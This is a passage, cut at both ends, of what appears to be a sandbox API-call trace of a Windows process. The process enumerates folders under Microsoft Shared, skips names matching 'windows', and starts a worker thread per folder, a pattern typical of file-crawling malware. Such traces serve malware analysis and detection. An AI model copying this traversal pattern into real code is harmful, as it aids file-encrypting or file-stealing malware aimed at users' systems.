Shared\\GRPHFLT\\*.*" [0040.120] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0040.120] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10ace0a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0040.120] CloseHandle (hObject=0x1e8) returned 1 [0040.120] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0040.121] lstrcmpW (lpString1=".", lpString2="Help") returned -1 [0040.121] lstrcmpW (lpString1="..", lpString2="Help") returned -1 [0040.121] lstrcmpiW (lpString1="windows", lpString2="Help") returned 1 [0040.122] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0040.122] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0040.122] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="Help" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help" [0040.122] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*" [0040.122] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0040.122] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10ae6110, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0040.124] CloseHandle (hObject=0x1e8) returned 1 [0040.124] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ink", cAlternateFileName="")) returned 1 [0040.124] lstrcmpW (lpString1=".", lpString2="ink") returned -1 [0040.124] lstrcmpW (lpString1="..", lpString2="ink") returned -1 [0040.124] lstrcmpiW (lpString1="windows", lpString2="ink") returned 1 [0040.125] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0040.125] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0040.125] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="ink" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink" [0040.126] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0040.126] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0040.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10afe178, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0040.126] CloseHandle (hObject=0x1e8) returned 1 [0040.126] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0040.126] lstrcmpW (lpString1=".", lpString2="MSClientDataMgr") returned -1 [0040.126] lstrcmpW (lpString1="..", lpString2="MSClientDataMgr") returned -1 [0040.127] lstrcmpiW (lpString1="windows", lpString2="MSClientDataMgr") returned 1 [0040.128] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0040.128] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0040.128] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="MSClientDataMgr" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr" [0040.128] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*.*" [0040.128] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0040.128] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10b161e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0040.130] CloseHandle (hObject=0x1e8) returned 1 [0040.130] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0040.130] lstrcmpW (lpString1=".", lpString2="MSInfo") returned -1 [0040.130] lstrcmpW (lpString1="..", lpString2="MSInfo") returned -1 [0040.130] lstrcmpiW (lpString1="windows", lpString2="MSInfo") returned 1 [0040.132] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0040.132] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0040.132] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="MSInfo" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo" [0040.132] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*" [0040.132] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0040.132] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10b2e248, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0040.133] CloseHandle (hObject=0x1e8) returned 1 [0040.133] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0040.133] lstrcmpW (lpString1=".", lpString2="OFFICE14") returned -1 [0040.133] lstrcmpW (lpString1="..", lpString2="OFFICE14") returned -1 [0040.133] lstrcmpiW (lpString1="windows", lpString2="OFFICE14") returned 1 [0040.135] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0040.135] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0040.135] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="OFFICE14" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14" [0040.135] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" [0040.135] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0040.135] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10b462b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0040.135] CloseHandle (hObject=0x1e8) returned 1 [0040.136] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0040.136] lstrcmpW (lpString1=".", lpString2="OfficeSoftwareProtectionPlatform") returned -1 [0040.136] lstrcmpW (lpString1="..", lpString2="OfficeSoftwareProtectionPlatform") returned -1 [0040.136] lstrcmpiW (lpString1="windows", lpString2="OfficeSoftwareProtectionPlatform") returned 1 [0040.138] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0040.138] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0040.138] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="OfficeSoftwareProtectionPlatform" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform" [0040.138] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" [0040.138] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0040.138] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10b5e318, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0040.139] CloseHandle (hObject=0x1e8) returned 1 [0040.139] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0040.139] lstrcmpW (lpString1=".", lpString2="PROOF") returned -1 [0040.139] lstrcmpW (lpString1="..", lpString2="PROOF") returned -1 [0040.139] lstrcmpiW (lpString1="windows", lpString2="PROOF") returned 1 [0040.141] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0040.141] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0040.141] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="PROOF" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF" [0040.141] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*" [0040.141] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0040.141] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10b76380, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0040.744] CloseHandle (hObject=0x1e8) returned 1 [0040.744] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0040.744] lstrcmpW (lpString1=".", lpString2="Smart Tag") returned -1 [0040.744] lstrcmpW (lpString1="..", lpString2="Smart Tag") returned -1 [0040.744] lstrcmpiW (lpString1="windows", lpString2="Smart Tag") returned 1 [0040.999] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0040.999] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.000] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="Smart Tag" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag" [0041.000] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*" [0041.000] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.000] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f79020, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.009] CloseHandle (hObject=0x384) returned 1 [0041.009] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0041.009] lstrcmpW (lpString1=".", lpString2="Source Engine") returned -1 [0041.009] lstrcmpW (lpString1="..", lpString2="Source Engine") returned -1 [0041.009] lstrcmpiW (lpString1="windows", lpString2="Source Engine") returned 1 [0041.012] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0041.012] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.012] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="Source Engine" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine" [0041.012] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*.*" [0041.012] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1119bc20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.022] CloseHandle (hObject=0x384) returned 1 [0041.022] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0041.022] lstrcmpW (lpString1=".", lpString2="Stationery") returned -1 [0041.022] lstrcmpW (lpString1="..", lpString2="Stationery") returned -1 [0041.022] lstrcmpiW (lpString1="windows", lpString2="Stationery") returned 1 [0041.024] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0041.024] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.024] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="Stationery" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery" [0041.025] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0041.025] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.025] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x111cbcf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.031] CloseHandle (hObject=0x384) returned 1 [0041.032] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0041.032] lstrcmpW (lpString1=".", lpString2="TextConv") returned -1 [0041.032] lstrcmpW (lpString1="..", lpString2="TextConv") returned -1 [0041.032] lstrcmpiW (lpString1="windows", lpString2="TextConv") returned 1 [0041.032] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0041.032] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.032] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="TextConv" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv" [0041.032] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" [0041.032] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.032] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9430528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.081] CloseHandle (hObject=0x384) returned 1 [0041.082] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES14", cAlternateFileName="")) returned 1 [0041.082] lstrcmpW (lpString1=".", lpString2="THEMES14") returned -1 [0041.082] lstrcmpW (lpString1="..", lpString2="THEMES14") returned -1 [0041.082] lstrcmpiW (lpString1="windows", lpString2="THEMES14") returned 1 [0041.082] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0041.082] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.082] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="THEMES14" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14" [0041.082] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0041.082] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.082] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x40e80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.092] CloseHandle (hObject=0x384) returned 1 [0041.092] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0041.092] lstrcmpW (lpString1=".", lpString2="TRANSLAT") returned -1 [0041.092] lstrcmpW (lpString1="..", lpString2="TRANSLAT") returned -1 [0041.092] lstrcmpiW (lpString1="windows", lpString2="TRANSLAT") returned 1 [0041.095] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0041.095] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.095] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="TRANSLAT" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT" [0041.095] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT", lpString2="\\*.*" | out: 